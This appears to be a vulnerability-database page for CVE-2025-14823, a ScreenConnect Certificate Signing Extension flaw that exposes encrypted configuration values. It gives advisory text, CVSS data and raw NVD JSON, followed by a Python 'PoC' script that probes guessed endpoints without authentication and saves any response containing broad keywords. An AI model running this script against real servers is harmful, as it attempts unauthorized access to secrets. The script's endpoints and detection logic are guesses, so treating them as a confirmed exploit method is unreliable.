Security Vulnerability Report
CVE-2025-14823 CVSS 5.3 MEDIUM

CVE-2025-14823

Published: 2025-12-18 16:15:53
Last Modified: 2026-01-16 19:10:48
Source: 7d616e1a-3288-43b1-a0dd-0a65d3e70a49

Description

In deployments using the ScreenConnect™ Certificate Signing Extension, encrypted configuration values, including an Azure Key Vault-related key, could be returned to unauthenticated users through a client-facing endpoint under certain conditions. The values remained encrypted and securely stored at rest; however, an encrypted representation could be exposed in client responses. Updating the Certificate Signing Extension to version 1.0.12 or higher ensures configuration handling occurs exclusively on the server side, preventing encrypted values from being transmitted to or rendered by client-side components.

CVSS Details

CVSS Score: 5.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:connectwise:screenconnect:*:*:*:*:*:*:*:* - VULNERABLE
ScreenConnect Certificate Signing Extension < 1.0.12

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-14823 PoC - Information Disclosure
# Target: ScreenConnect Certificate Signing Extension
# Description: Unauthenticated access to encrypted configuration values

import requests
import json

TARGET_URL = "https://vulnerable-server/"


def exploit_cve_2025_14823():
    """
    Exploit for CVE-2025-14823
    Attempts to retrieve encrypted configuration values including
    Azure Key Vault keys through client-facing endpoints without authentication.
    """
    # Common endpoints that might expose configuration
    endpoints = [
        "ClientService.axd",
        "api/session/config",
        "SetupWizard.aspx",
        "CertificateSigning/Config",
    ]

    print("[*] CVE-2025-14823 - ScreenConnect Certificate Signing Extension Info Disclosure")
    print(f"[*] Target: {TARGET_URL}")

    for endpoint in endpoints:
        try:
            url = f"{TARGET_URL}{endpoint}"

            # Send unauthenticated request
            response = requests.get(url, timeout=10, verify=False)

            # Check for encrypted configuration values in response
            if response.status_code == 200:
                content = response.text

                # Look for patterns indicating encrypted key vault data
                if any(pattern in content.lower() for pattern in [
                    "azurekeyvault", "encrypted", "keystore", "keyvault",
                    "configuration", "certificate", "signing"
                ]):
                    print(f"[!] Potential sensitive data found at: {url}")
                    print(f"[!] Response length: {len(content)} bytes")

                    # Save response for analysis
                    with open(f"cve_2025_14823_response_{endpoint.replace('/', '_')}.txt", 'w') as f:
                        f.write(content)

                    print(f"[!] Response saved for analysis")
                    return True

        except requests.RequestException as e:
            print(f"[-] Error accessing {endpoint}: {e}")

    print("[*] Exploitation complete. Check saved responses for encrypted configuration data.")
    return False


if __name__ == "__main__":
    exploit_cve_2025_14823()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14823", "sourceIdentifier": "7d616e1a-3288-43b1-a0dd-0a65d3e70a49", "published": "2025-12-18T16:15:52.503", "lastModified": "2026-01-16T19:10:48.387", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In deployments using the ScreenConnect™ Certificate Signing Extension, encrypted configuration values including an Azure Key Vault-related key, could be returned to unauthenticated users through a client-facing endpoint under certain conditions. The values remained encrypted and securely stored at rest; however, an encrypted representation could be exposed in client responses. Updating the Certificate Signing Extension to version 1.0.12 or higher ensures configuration handling occurs exclusively on the server side, preventing encrypted values from being transmitted to or rendered by client-side components."}], "metrics": {"cvssMetricV31": [{"source": "7d616e1a-3288-43b1-a0dd-0a65d3e70a49", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "7d616e1a-3288-43b1-a0dd-0a65d3e70a49", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-201"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:connectwise:screenconnect:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.0.12", "matchCriteriaId": "3BEF42B2-9FB7-4AD0-9B7A-3980D1670F72"}]}]}], "references": [{"url": "https://www.connectwise.com/company/trust/security-bulletins/2025-12-18-screenconnect-certificate-signing-extension-update", "source": "7d616e1a-3288-43b1-a0dd-0a65d3e70a49", 
"tags": ["Vendor Advisory"]}]}}